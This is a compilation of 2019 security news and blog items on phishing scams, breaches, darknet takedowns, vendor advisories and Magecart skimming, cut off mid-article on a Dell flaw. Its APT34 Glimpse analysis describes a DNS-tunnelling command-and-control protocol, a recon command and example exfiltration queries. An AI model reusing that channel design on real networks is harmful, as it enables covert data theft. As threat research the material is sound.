Continue reading...

#Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account

If you’re an avid Instagram user, chances are you’ve come across some accounts with a little blue checkmark next to the username. This little blue tick is Instagram’s indication that the account is verified. While it may seem insignificant at first glance, this badge actually means that Instagram has confirmed that the account is an authentic page of a public figure, celebrity, or global brand. In today’s world of social media influencers, receiving a verified badge is desirable so other users know you’re a significant figure on the platform. However, cybercriminals are taking advantage of the appeal of being Instagram verified as a way to convince users to hand over their credentials.

So, how do cybercriminals carry out this scheme? According to security researcher Luke Leal, this scam was distributed as a phishing page through Instagram. The page resembled a legitimate Instagram submission page, prompting victims to apply for verification. After clicking on the “Apply Now” button, victims were taken to a series of phishing forms with the domain “Instagramforbusiness[.]info.” These forms asked users for their Instagram logins as well as confirmation of their email and password credentials. However, if the victim submitted the form, their Instagram credentials would make their way into the cybercriminal’s email inbox. With this information, the cybercrooks would have unauthorized access to the victim’s social media page. What’s more, since this particular phishing scam targets a user’s associated email login, hackers would have the capability of resetting and verifying ownership of the victim’s account.

Whether you’re in search of an Instagram verification badge or not, it’s important to be mindful of your cybersecurity. And with Social Media Day right around the corner, check out these tips to keep your online profiles protected from phishing and other cyberattacks:

  • Exercise caution when inspecting links. If you examine the link used for this scam (Instagramforbusiness[.]info), you can see that it is not actually affiliated with Instagram.com. Additionally, it doesn’t use the secure HTTPS protocol, indicating that it is a risky link. Always inspect a URL before you click on it. And if you can’t tell whether a link is malicious or not, it’s best to avoid interacting with it altogether.
  • Don’t fall for phony pages. If you or a family member is in search of a verified badge for their Instagram profile, make sure they are familiar with the process. Instagram users should go into their own account settings and click on “Request on verification” if they are looking to become verified. Note that Instagram will not ask for your email or password during this process, but will send you a verification link via email instead.
  • Reset your password. If you suspect that a hacker is attempting to gain control of your account, play it safe by resetting your password.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post #Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account appeared first on McAfee Blogs.

Australian National University hit by huge data breach

Vice-chancellor says hack involved personal and payroll details going back 19 years

The Australian National University is in damage control after discovering a major data breach a fortnight ago in which a “significant” amount of staff and student information was accessed by a “sophisticated operator”.

The university has confirmed an estimated 200,000 people have been affected by the hack, based on student numbers each year and staff turnover.

Related: Australian security services investigate attempted cyber attack on parliament

Continue reading...

The Guardian view on cybercrime: the law must be enforced | Editorial

Governments and police must take crime on the internet seriously. It is where we all live now

About half of all property crime in the developed world now takes place online. When so much of our lives, and almost all of our money, have been digitised, this is not surprising – but it has some surprising consequences. For one thing, the decline in reported property crimes trumpeted by successive British governments between 2005 and 2015 turns out to have been an illusion. Because banks were not required to report fraud to the police after 2005, they often didn’t. It would have made both banks and police look bad to have all that crime known and nothing done about it. The cost of the resulting ignorance was paid by the rest of government, and by the public, too, deprived of accurate and reliable knowledge. Since then, the total number of property crimes reported has risen from about 6m to 11m a year as the figures have taken computerised crime into account.

The indirect costs to society are very much higher than the hundreds of millions that individuals lose. One example is the proliferation of plagiarism software online, which developed an entire industry in poor, English-speaking countries like Kenya, serving idle or ignorant students in England and North America. The effort required by schools and universities to guard against such fraud has been considerable, and its cost entirely disproportionate to the gains made by the perpetrators.

Continue reading...

2019 Verizon Data Breach Investigations Report (DBIR) Key Takeaways

The 2019 Verizon Data Breach Investigations Report (DBIR) was released today, and I was lucky enough to be handed a hot off the press physical copy while at the Global Cyber Alliance Cyber Trends 2019 event at Mansion House, London. For me, the DBIR provides the most insightful view on the evolving threat landscape, and is the most valuable annual “state of the nation” report in the security industry.

Global Cyber Alliance Cyber Trends 2019

The DBIR has evolved since its initial release in 2008, when it was payment card data breach and Verizon breach investigations data focused. This year’s DBIR involved the analysis of 41,686 security incidents from 66 global data sources in addition to Verizon. The analysed findings are expertly presented over 77 pages, using simple charts supported by ‘plain English’ astute explanations, reason why then, the DBIR is one of the most quoted reports in presentations and within industry sales collateral.

DBIR 2019 Key Takeaways
      • Financial gain remains the most common motivate behind data breaches (71%)
      • 43% of breaches occurred at small businesses
      • A third (32%) of breaches involved phishing
      • The nation-state threat is increasing, with 23% of breaches by nation-state actors
      • More than half (56%) of data breaches took months or longer to discover
      • Ransomware remains a major threat, and is the second most common type of malware reported
      • Business executives are increasingly targeted with social engineering, attacks such as phishing\BEC
      • Crypto-mining malware accounts for less than 5% of data breaches, despite the publicity it didn’t make the top ten malware listed in the report
      • Espionage is a key motivation behind a quarter of data breaches
      • 60 million records breached due to misconfigured cloud service buckets
      • Continued reduction in payment card point of sale breaches
      • The hacktivist threat remains low, the increase of hacktivist attacks report in DBIR 2012 report appears to be a one-off spike

Avoid a Security Endgame: Learn About the Latest “Avengers” Scam

Marvel Studio’s $2.2 billion box-office hit “Avengers: Endgame” has quickly risen to the second-highest grossing film of all time in its first two weekends. Not surprisingly, cybercriminals have wasted no time in capitalizing on the movie’s success by luring victims with free digital downloads of the film. How? By tempting users with security shortcuts so they can watch the film without worrying about spoilers or sold-out movie tickets.

When a victim goes to download the movie from one of the many scam sites popping up around the web, the streaming appears to begin automatically. What the user doesn’t know is that the footage being streamed is just from the movie’s trailer. Soon after, a message pops up stating that the user needs to create an account to continue with the download. The “free” account prompts the user to create a username and password in advance, which could potentially be useful for cybercriminals due to the common practice of password reuse. Once a victim creates an account, they are asked for billing information and credit card details in order to “verify location” and make sure the service is “licensed to distribute” the movie in the victim’s region. These crooks are then able to scrape the victim’s personal and financial data, potentially leading to online account hacks, stolen funds, identity theft, and more.

Luckily, Marvel fans can protect their online data to avoid a cybersecurity endgame by using the following tips:

  • Look out for potential scam activity. If it seems too good to be true, then it probably is. Be wary of websites promising free movie downloads, especially for movies that are still in theaters.
  • Shield your financial data. Be suspicious of “free downloads” that still require you to fill out billing information. If an unknown website asks for your credit card information or your bank account data, it’s best to avoid the site altogether.
  • Make sure your credentials are unique. With this scam, threat actors could use the login credentials provided by the victim to access their other accounts if they didn’t have a unique login. Avoiding username and password reuse makes it a lot harder for cybercriminals to hack into your other online accounts if they gain access to one.
  • Assemble a team of comprehensive security tools. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links and will warn you in the event that you do accidentally click on something malicious.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Avoid a Security Endgame: Learn About the Latest “Avengers” Scam appeared first on McAfee Blogs.

Using the Human Factor in Cyber Attacks

The Human Factor has a fundamental importance for the success of a cyber attack, for this reason it is important to create a culture of cyber security within organizations.

Every day we see a large number of tools being implemented within enterprises and institutions due to the need to keep their environments more secure, along with this implementation of tools comes a series of responsibilities to make resources be used efficiently and effectively, generating the results expected by the Analysts, Managers, and Management. When we speak of a corporate environment there are a number of tools that we can find, such as Web Application Firewall (WAF), Intrusion Prevention Service (IPS), Antispam, Antivirus, Firewall, Web Filter / Application Control, DLP (Data Loss Prevent) Switches, Routers and etc. Each of these tools has its characteristic and function within the corporate environment, being well configured generate results and metrics that help managers make decisions for environment/business growth, security improvement, and others.

In recent years there has been a significant increase in cyber attacks and attempts to exploit vulnerabilities, attackers have increasingly studied CVEs (Common Vulnerabilities and Exposures) based on this knowledge to try to exploit, invade and exfilt data from companies or individuals. When implementing a security tool within a company, it is necessary to pay attention to some points that go beyond the implementation project, some of these points are maintenance and updating of the tool following the good practices of the manufacturer. A very common error that occurs today and makes many companies vulnerable to attacks is that they only care about the tool in the implementation process, after that the points mentioned above that require constant attention during the tool life cycle inside the company are forgotten and make the environment susceptible to attacks and exploitations.

Some points that make environments vulnerable:

  • Old tools.
  • Outdated tools.
  • Poor resource management.
  • Human factor.

From these points mentioned above, I would like to draw attention to the ‘Human Factor’, due to the technological growth, it became fundamental the importance of creating a culture of security policy in the day to day of the collaborators. Companies are investing more and more in lectures, training and workshops to try to reduce an attack or invasion is caused by the human factor, when we speak of human factor can be exemplified as follows: the attacker sends an email with a supposed advertisement or promotion and in it comes a link that will direct the user to this “promotion”, but when in fact it is a malicious link (this attack is called Phishing), the user may be infected with some Malware and from that machine the attacker has internal access and begins to make lateral movements in an attempt to exploit or compromise the company environment. Every day we see research being done by tool makers showing that most of the attacks that occur still have the human factor, that is, a user who is not prepared to identify some simple types of attacks, such as phishing and that can compromise the entire security of the company.

There are currently three most commonly used types of Phishing attacks:

Mass-Scale Phishing: Attack where fraudsters launch an extensive network of attacks that are not highly targeted

Spear Phishing: Tailor-made for a specific victim or group of victims using personal details.

Whaling: A specialized type of spear phishing that targets a “large” victim of a company, for example CEO, CFO or other executive.

Below we have the anatomy of a phishing attack:

human factor

About the author: Zoziel Freire

Cyber Security Analyst Content Writer of the portal: www.infosectrain.com Analyst document’s malicious CompTIA Security Analytics Professional LPIC-3 Enterprise Linux Professionals CompTIA Cybersecurity Analyst Linkedin: https://www.linkedin.com/in/zozielfreire/

Pierluigi Paganini

(SecurityAffairs – Human Factor, cybersecurity)

Twitter: https://twitter.com/zoziel

The post Using the Human Factor in Cyber Attacks appeared first on Security Affairs.

Authorities shut down major darknet marketplaces: the Wall Street Market and Valhalla

German police have shut down one of the world’s largest black marketplace in the darkweb, the ‘Wall Street Market,’ and arrested its operators.

The German police, with the support of Europol, Dutch police and the FBI, has shut down one of the world’s largest black marketplace in the darkweb, the ‘Wall Street Market,’ and arrested three operators allegedly running it. The three German nation suspects were arrested on April 23 and 24 in the states of Hesse, Baden-Wuerttemberg and North Rhine-Westphalia.

The operation also allowed to arrest of two major suppliers of illegal narcotics in the United States.

The operation against the Wall Street Market started earlier this year after Finnish authorities also shut down another black marketplace, the Silkkitie market (aka the Valhalla marketplace). Many Finnish narcotics sellers moved to the Wall Street Market.

“The German Federal Criminal Police (Bundeskriminalamt) shut down the Wall Street Market, under the authority of the German Public Prosecutor’s office. They were supported by the Dutch National Police (Politie), Europol, Eurojust and various US government agencies (Drug Enforcement Administration, Federal Bureau of Investigation, Internal Revenue Service, Homeland Security Investigations, US Postal Inspection Service, and the US Department of Justice).” reads a press release published by the Europol.

“The Silkkitie (known as the Valhalla Marketplace) and its contents was also seized by Finnish Customs (Tulli) in close cooperation with the French National Police (La Police Nationale Française). 

The Wall Street Market marketplace was considered one of the most important points of aggregation in the cybercrime underground for trading in cocaine, heroin, cannabis and amphetamines as well as digital goods (i.e. stolen data, malware, and fake documents).

The Tor-based marketplace had more than one million registered accounts, more than 5,000 registered sellers and more than 60,000 sales offers.

“The illegal platform was exclusively accessible via the Tor network in the so-called Darknet and aimed at international trade in criminal goods.” continues the Europol. “Most recently, more than 63 000 sales offers were placed on the online marketplace and more than 1 150 000 customer accounts and more than 5 400 sellers registered. For payment, the users of the online marketplace used the crypto currencies Bitcoin and Monero. The alleged marketplace officials are said to have received commission payments of 2 to 6 percent of the sales value for the settlement of illegal sales of the platform.”

The anonymity of the payment was ensured by using Bitcoin and Monero cryptocurrencies. It was a prolific business for the Wall Street market operators that were keeping for them a fee of two to six percent of the sales value.

The German authorities seized over €550 000 in cash and millions worth of cryptocurrencies, the police also seized several vehicles and of course computers and data storage. 

Behind this new success against the cybercrime there is a dedicated Dark Web Team established by the Europol that works together with EU partners and law enforcement across the globe.

The team delivers a complete, coordinated approach for:

  • sharing information;
  • providing operational support and expertise in different crime areas;
  • developing tools, tactics and techniques to conduct dark web investigations;
  • identifying threats and targets. 

“A shared commitment across the law enforcement community worldwide and a coordinated approach by law enforcement agencies has once again proved their effectiveness.” concludes the Europol. “The scale of the operation at Europol demonstrates the global commitment to tackling the use of the dark web as a means to commit crime.”

Pierluigi Paganini

(SecurityAffairs – Wall Street Market, hacking)

The post Authorities shut down major darknet marketplaces: the Wall Street Market and Valhalla appeared first on Security Affairs.

Cisco addresses a critical flaw in Nexus 9000 switches

Cisco released security patches to address tens of vulnerabilities in its products, including a critical vulnerability affecting Nexus 9000 switches.

Cisco released security patches to address tens of vulnerabilities in its products. Among the flaws fixed by Cisco, there is also a critical vulnerability in Nexus 9000 switches that is tracked as CVE-2019-1804 and that received a CVSS score of 9.8.

Cisco Nexus 9000

The vulnerability resides in the SSH key management for the Cisco Nexus 9000 Series Application Centric Infrastructure Mode Switch Software and it is related to the presence of a default SSH key pair in all devices.

The default SSH key pair could be exploited by an attacker by opening an SSH connection via IPv6 to a targeted device, in this way the attacker will be able to connect to the system with the privileges of the root user.

“A vulnerability in the SSH key management for the Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software could allow an unauthenticated, remote attacker to connect to the affected system with the privileges of the rootuser.” reads the security advisory published by Cisco.

“The vulnerability is due to the presence of a default SSH key pair that is present in all devices. An attacker could exploit this vulnerability by opening an SSH connection via IPv6 to a targeted device using the extracted key materials. An exploit could allow the attacker to access the system with the privileges of the root user.”

This flaw could not be exploitable over IPv4.

The flaw affects Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode running Cisco NX-OS software release prior to 14.1(1i).

Users have to install software update released by Cisco to address the flaw, no workaround is known.

The good news is that Cisco is not aware of the exploitation of the vulnerability in attacks in the wild.

Cisco also addressed over 20 High severity vulnerabilities affecting the Web Security Appliance (WSA), Umbrella Dashboard, Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software, RV320 and RV325 routers, IP Phone 7800 and 8800 Series, Application Policy Infrastructure Controller (APIC) software, and the Nexus 9000 switches.

The list of flaws includes privilege escalation issues, denial of service vulnerabilities and session hijacking bugs.

Pierluigi Paganini

(SecurityAffairs – Cisco Nexus 9000, hacking)

The post Cisco addresses a critical flaw in Nexus 9000 switches appeared first on Security Affairs.

10KBLAZE exploits could affect 9 out of 10 SAP installs of more than 50k customers

The availability of 10KBLAZE PoC exploits for old SAP configuration issue poses a severe risk of attacks for business applications.

The risk of cyber attacks against SAP systems is increased after security researchers released PoC exploits for old SAP configuration flaws.

SAP Message Server and SAP Gateway implements an access control list (ACL) mechanism to determine IP addresses that are allowed to register application servers. ACL wrong configurations could allow any host with network access to the Message Server to register an application server.

In this scenario, an attacker can access a network hosting the vulnerable systems and take full control.

Experts pointed out that the problem could impact many SAP products, including S/4HANA and NetWeaver Application Server (AS).
The good news is that most recent versions of SAP software are configured by default to drop unauthorized connections,

Since 2005, SAP is providing instructions on how to configure an ACL for the Message Server. In 2005 the company released the security note 8218752 and in 2009 released the security note 14080813 containing instructions on how to properly configure the access list for Gateway. In 2010 SAP released another note, 14210054, that provides instructions on the correct configuration of Message Server ACL.

Despite the numerous notes, many organizations still fail to properly configure their SAP solutions. According to a report published in April 2018 by security firm Onapsis, 90 percent SAP systems were impacted by 13 Year-Old configuration vulnerability that affects SAP Netweaver and that can be exploited by a remote unauthenticated attacker who has network access to the system.

In April, the two researchers Dmitry Chastuhin and Mathieu Geli presented at the OPCDE cybersecurity conference in Dubai security issues related to SAP configuration and architecture.

The security duo also released exploits designed to target improperly configured systems.

sap 10KBLAZE exploits

Experts at Onapsis dubbed the exploits 10KBLAZE, they estimate that the availability of the hacking codes could significantly increase the number of attacks against SAP installs. Onapsis estimate that 10KBLAZE exploits could affect 9 out of 10 SAP systems of more than 50,000 customers worldwide.

“In April 2019, several new exploits targeting SAP business applications were released in a public forum. Although the exploits target insecure configurations that have been reported by SAP SE and Onapsis in the past, their public release significantly increases the risk of successful cyber attacks against SAP implementations globally.” reads the analysis published by Onapsis. “we estimate these exploits could affect 9 out of 10 SAP systems of more than 50,000 customers world-wide.”

The name 10KBLAZE comes by the fact that organizations hit by attacks would need to disclose their impact to the U.S. Securities and Exchange Commission (SEC) in their annual 10-K filing.

“Based on publicly available data provided by SAP, Onapsis estimates that approximately 50,000 companies and a collective 1,000,000 systems are currently using SAP NetWeaver and S/4HANA.” reads the report published by the experts. “Onapsis research gathered over ten years calculates that nearly 90% of these systems, approximately 900,000, may suffer from the misconfigurations for which these exploits are now publicly available,”

Researchers also found many SAP systems exposed on the internet that could be hit by remote, unauthenticated attackers.

Organizations have to check their configurations to prevent such kind of attacks.

Pierluigi Paganini

(SecurityAffairs – 10KBLAZE , Genesis Store)

The post 10KBLAZE exploits could affect 9 out of 10 SAP installs of more than 50k customers appeared first on Security Affairs.

Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme

The US DoJ indicted a Russian national for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

The US DoJ indicted the Russian national Anton Bogdanov for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

Bogdanov was charged in federal court in Brooklyn of wire fraud conspiracy, aggravated identity theft and computer intrusion in connection with a scheme in which he and other crooks used stolen personal information to file federal tax returns and fraudulently obtain more than $1.5 million in tax refunds from the Internal Revenue Service.

The Russian man was arrested in Phuket, Thailand, on November 28, 2018 and was extradited to the United States in March 2019. 

“As alleged in the indictment, Bogdanov and his co-conspirators combined sophisticated computer hacking and identity theft with old-fashioned fraud to steal more than $1.5 million from the U.S. Treasury,” stated United States Attorney Donoghue.  “This Office, together with our law enforcement partners, will use all our available resources to target and bring cybercriminals to justice, wherever they are.”

According to the indictment, between June 2014 and November 2016,
Anton Bogdanov and his co-conspirators compromised computer systems of private tax preparation firms in the United States and stole personally identifiable information (PII) (including Social Security numbers and dates of birth) of the victims.

Crooks used stolen data to impersonate the victims and modified the tax returns to ensure that the refunds are paid to their prepaid debit cards.

“Bogdanov and his co-conspirators also used misappropriated PII to obtain prior tax filings of victims from an IRS website, and filed new tax returns, purportedly on behalf of the victims, so that refunds were paid to prepaid debit cards under their control.” reads the press release published by the DoJ. “The debit cards were cashed out in the United States, and a percentage of the proceeds was wired to Bogdanov in Russia.”

Anton Bogdanov

According to the investigators, the debit cards were cashed out in the United States, while Bogdanov received a percentage of the proceeds in Russia.

If convicted of the charges, Anton Bogdanov could face up to 27 years’ imprisonment.

Pierluigi Paganini

(SecurityAffairs – Anton Bogdanov, cybecrime)



The post Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme appeared first on Security Affairs.

APT34: Glimpse project

The APT34 Glimpse project is maybe the most complete APT34 project known so far, the popular researcher Marco Ramilli analyzed it for us.

Indeed we might observe a File-based command and control (a quite unusual solution) structure, a VBS launcher, a PowerShell Payload and a covert channel over DNS engine. This last feature is the most appreciated characteristics attributed to APT34. But let’s move on and start a quick analysis on it.

Context:

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19 2019 researchers at Chronicle, a security company owned by Google’s parent company, Alphabet, have examined the leaked tools, exfiltrated the past week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset also has been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

Today I’d like to focus my attention on the Glimpse project since, in my personal opinion, it could be considered as the “stereotype” of APT34 (with the data we ‘ve got so far).

The Glimpse Project

The package comes with a README file having as a name “Read me.txt” (note the space). The name per se is quite unusual and the content is a simple guide on how to set a nodejs server and a Windows server who would run the “stand alone” .NET (>v4) application to control infected machines. The infection start by propagating a .VBS script called “runner_.vbs” which is a simple runner of a most sophisticated powershell payload. The Powershell payload is a quite complex script acting several functions. The following image shows its “deobfuscated” main loop.

Glimpse Infection Payload Main Loop

The payload loops waiting for instructions, once a command comes from C2 it starts to perform specific actions and it answers back to C2 by requesting crafted subdomains based on variable $aa_domain_bb. One of the most important functions the payload has implemented is to drop and execute additional toolsets. Indeed this payload is mainly a delivery module with some additional controls entirely based on DNS covert channel.

The $aa_domain_bb variable contains the main domain name for which the C2 acts as authoritative Domain Name Server. While no actions are coming from C2 the infected agent would just periodically “ping” C2 by giving basic informations regarding the victim machines. For example the function aa_ping_response_bb would compose an encoded DNS message ( aa_text_response_bb ) which sends it own last IP address. At this stage we might appreciate two communication ways. The first communication channel comes from the subdomain generation for example: 59071Md8200089EC36AC95T.www.example.com while a second communication channel comes from TXT DNS record such as: control: 95 – ackNo: 0 – aid: 59071d8289 – action: M >>> 59071Md8200089EC36AC95T. Both of them are implemented to carry different informations. One of the most important function is the aa_AdrGen_bb which is the communication manager. It implements the control layer in order to send and to receive control informations such as: commands, bytes received, if the file transfer has been close, and so on and so forth. The decoded actions are stored into the variable aa_act_bb and are the following ones:

Command and Control. Env creation for new connected agents
  • M. If the agent is already registered to C2 this command acts like a ping, it updates basic informations to the corresponding “agent” folder. If it’s the first time the agent connects back to C2 it starts a registration section which enables, server side (command and control side) the building up of an dedicated folders and file environment. Please check the previous image: Command and Control. Env creation for new connected agents.
  • W. This is a TXT request to list the waiting commands (or, if you wish “kind of jobs”). The first command that is executed after the registration phase is the command tagged as 10100 having as a content: “whoami&ipconfig /all”
  • D. Is actually what should be executed. It takes as input the tagged task and it forwards to the requesting Agent the Base64 encoded content of the file.
  • 0. It is not a TXT request. This request makes the authoritative DNS (the command and control) answers to the agent the requested file in the waiting folder. Answering back an A record having as data field a crafted ip (11.24.237.110) if no “actions” (fileS) are in the waiting folder the C2 answers back an A record value having as data field “24.125.” + fileNameTmp.substring(0, 2) + “.” + fileNameTmp.substring(2, 5); and time to live a random number between 0 to 360.
  • 1. It is not a TXT request. This request makes the authoritative DNS (the command and control) answer back with the file content. It implements a multiple answering chain, according to RFC4408, to send files greater than 255 characters.
  • 2. It is not a TXT request. This requests makes the authoritative DNS (the command and control) to receive a file from the Agent. It implements a complex multi-part chain for reconstructing partials coming from domain name requests. After sending all of the data, the Agent will issue a final DNS query with “COCTabCOCT” in the data segment. This query notifies the C2 server that the Trojan has finished sending the contents of the file.
Command and Control: COCTabCOCT end of communication

The following image shows a running example of the infection chain run on a controlled virtual environment.You might appreciate the communication layers over the requested domains. For example the following requests would carry on data in subdomain, while the answered IP gives a specific affermative/negative response.

10100*9056*****************.33333210100A[.]example[.]com

Glimpse running environment

The command and control is implemented by a standalone .NET application working through files. The backend, a nodeJS server, runs and offers Public API and and saves, requests to agents, and results from agents, directly into files named with “UID-IP” convention acting as agent ID. The panel reads those files and implements stats and actions. The following image shows the static configuration section in the C2 panel.

Command and Control Panel Hardcoded Settings

The Control Panel is mainly composed by two .NET Window components. Main Windows where the list of connected Agents is shown within additional informations such as: Agent ID, Agent IP, Agent Last Online Time and Attacker Comments. And Control Window which is called once the attacker clicks on the on a selected Agent. The event onClick spawn the following code:

controlPanel = new controlPanel(agent.id, agent.ip, agent.lastActivity);
controlPanel.Show();

After its initialisation phase the control panel enables the attacker to write or to upload a list of commands or a file within commands to agents. The following image shows the controPanel function which takes commands from inputs “TextFields”, creates a new file into the waiting folder within commands. The contents of such a folder will be dropped on the selected Agent and executed.

Command and Control, controlPanel insert_command function

The controlPanel offers many additional functionalities to better control single or group of Agents. By focusing on trying to give a project date we might observe the compiled time which happens to be 9/1/2018 at 5:13:02 AM for newPanel-dbg.exe while it happens to be 9/8/2018 at 8:01:54 PM for the imported library called ToggleSwitch.dll.

With High probability we are facing a multi-modular attacking framework where on one side the DNS communication channel delivers commands to the target Agents and on the other side many control panels could be developed and attached to the DNS communication system. It would be quite obvious if you look to that framework as a developer, thus the DNS communication channel uses files to store informations and to synchronise actions and agents, so that many C2 could be adapted to use it as a communication channel. We might think that that many APT34 units would be able to reuse such a communication channel. Another interesting observation might come from trying to date that framework. A powershell Agent as been leaked on PasteBin o August 2018 (take a look here) by an anonymous user and seen, since today, from very few people (197 so far). The used command and control has been compiled the month before (July 2018). The developing technologies (.NET, nodeJS) are very different and the implementation styles differ as well. DNS Communication channel is developed in linear and more functional driven programming style, while the standalone command and control is developed using a little bit more sophisticated object oriented programming with a flavour of agent-oriented programming: the attacker considers the object agentt as an independent agent working without direct control. The attacker writes files as the medium to address the Agent behaviour.

The original post was published on the Marco Ramilli’s blog:

https://marcoramilli.com/2019/05/02/apt34-glimpse-project/

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, Glimpse project)

The post APT34: Glimpse project appeared first on Security Affairs.

Magecart Group 12 also targets Opencart-based online stores

Magecart made the headlines again, Magecart Group 12 is conducting a large-scale operation that targets OpenCart online stores.

According to security experts at RiskIQ, the Magecart Group 12 is behind a large-scale operation against OpenCart online stores. The attackers used stealth tactics to remain under the radar and siphon payment data from compromised e-commerce sites.

Security firms have monitored the activities of a dozen Magecart groups at least since 2015. The gangs use to implant skimming script into compromised online stores in order to steal payment card data on, but they are quite different from each other. 

According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British AirwaysNeweggTicketmaster, and Feedify​​

OpenCart is in the most popular e-commerce platforms worldwide that is currently used by thousands of online stores of any size. OpenCart one of the top three e-commerce CMS, after Shopify and Magento, it is normal that crooks attempt to target it too.

Previous attacks carried out by the Magecart Group 12 hit e-commerce services used by thousands of online stores that ran versions of  Magento, OpenCart, and OSCommerce. The attacks against OpenCart-based stores is similar to the Magento ones.

“We’ll also break down a large-scale Magecart Group 12 campaign uncovered by RiskIQ researchers abusing the OpenCart platform, which is run by thousands of e-commerce sites.” reads the analysis published by RiskIQ. “Group 12 breached OpenCart sites to inject their skimmer similar to the Magento attacks, starting with the insertion of a very well-picked domain name: batbing[.]com.”

In the latest wave of attacks, Magecart group 12 injected their skimmer into OpenCart websites only after checking if the visitor accessed a checkout page. Technically they added the following pre-filter JavaScript code:

Magecart Group 12 OpenCart

Attackers used a domain name that attempts to impersonate the Bing.com search engine script.

“One other notable element of this attack is the impersonation attempt for the Bing.com search engine script: “

https://batbing[.]com/js/bat.min.js

The normal Bing URL looks very similar:

https://bat[.]bing[.]com/bat.js

RiskIQ with the support of AbuseCH and the Shadowserver Foundation took offline the domain used by the hackers.

Experts found references to the skimmer script in a forum post on the OpenCart forum.

RiskIQ experts believe that new types of web skimming attacks will be observed in the future, hackers will go beyond payment data attempting to steal login credentials and other sensitive information.

“It’s likely that new breeds of these web skimming attacks will emerge in the future, whether by new or existing Magecart groups. They’re currently focusing on payment data, but we’re already seeing moves to skim login credentials and other sensitive information.” concludes RiskIQ. “This widens the scope of potential Magecart victims far beyond e-commerce alone.”

Pierluigi Paganini

(SecurityAffairs – Magecart Group 12, OpenCart)

The post Magecart Group 12 also targets Opencart-based online stores appeared first on Security Affairs.

A ‘Cyber Event’ disrupted power grid operations in three US states

The Department of Energy confirmed that in March a cyber event disrupted power grid operations in California, Wyoming, and Utah.

The Department of Energy confirmed that on March 2019, between 9 a.m. and 7 p.m., a cyber event disrupted energy grid operations in California, Wyoming, and Utah.

The news was first reported by E&E News, a “cyber event” interrupted grid operations in parts of the western United States in March, according to a report posted by the Department of Energy.

The report states that interruptions of electrical system operations were observed in California (Kern County, Los Angeles County), Utah (Salt Lake County), Wyoming (Converse County). The report doesn’t include the name of the utility company that suffered the incident. It must be clear that a report of a cyber incident doesn’t necessarily imply that the company has been hacked, in some cases human errors or system misconfigurations could be the root causes of a cyber incident.

power grid incident

U.S. utilities are required to notify DOE within one hour of a cyber attack against their systems. DoE could fine up to $2,500 per day power companies that fail to file an OE-417 electric disturbance report.

Media outlets like E&E News and Motherboard correctly defined the report as cryptic, Department of Energy has not responded to a request by Motherboard for more information about the cyber event.

“A “cyber event,” according to infrastructure hacking experts, could be anything from hackers messing with the grid remotely, to a much less dramatic hardware or software bug.” reported MotherBoard.

Anyway, if confirmed that hackers remotely interfered with power grid networks in the US, the event would be unprecedented for the country. The unique power grid hacks recognized by the cyber security community is the one that caused massive power outages in Ukraine in 2015 and in 2016.

The E&E News cited for instance the incident occurred in January 2018 at a Michigan utility Consumers Energy. It filed the same type of DOE notice when an employee in training accidentally caused a blackout for about 15,000 people (Energywire, March 8, 2018).

“There was no malicious intent” in that case, a spokeswoman said at the time, and Consumers Energy brought the lights back on within a few hours.

Cyber attacks against critical infrastructures, including power grids, are dangerous threats and possible consequences are unpredictable, for this reason, it is essential to share knowledge about attacks and attackers’ TTPSs.

Pierluigi Paganini

(SecurityAffairs – power grid, hacking)

The post A ‘Cyber Event’ disrupted power grid operations in three US states appeared first on Security Affairs.

How to Hack Dell computers exploiting a flaw in pre-installed Dell SupportAssist

A flaw in Dell SupportAssist, a pre-installed tool on most Dell computers, could be exploited by hackers to compromise them remotely.

The security researcher Bill Demirkapi (17) has discovered a critical remote code execution vulnerability in the Dell SupportAssist utility that is pre-installed on most Dell computers.

The vulnerability could be exploited by hackers to compromise systems remotely.

Dell SupportAssist software is described as a tool that proactively checks the health of system’s hardware and software. When an issue is detected, the necessary system state information is sent to Dell for troubleshooting.

